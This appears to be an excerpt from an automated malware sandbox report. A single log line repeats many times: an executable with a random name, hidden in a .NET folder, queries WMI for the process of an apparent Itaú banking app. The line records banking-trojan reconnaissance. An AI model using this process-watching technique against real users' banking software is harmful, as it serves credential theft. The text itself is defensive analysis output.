Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
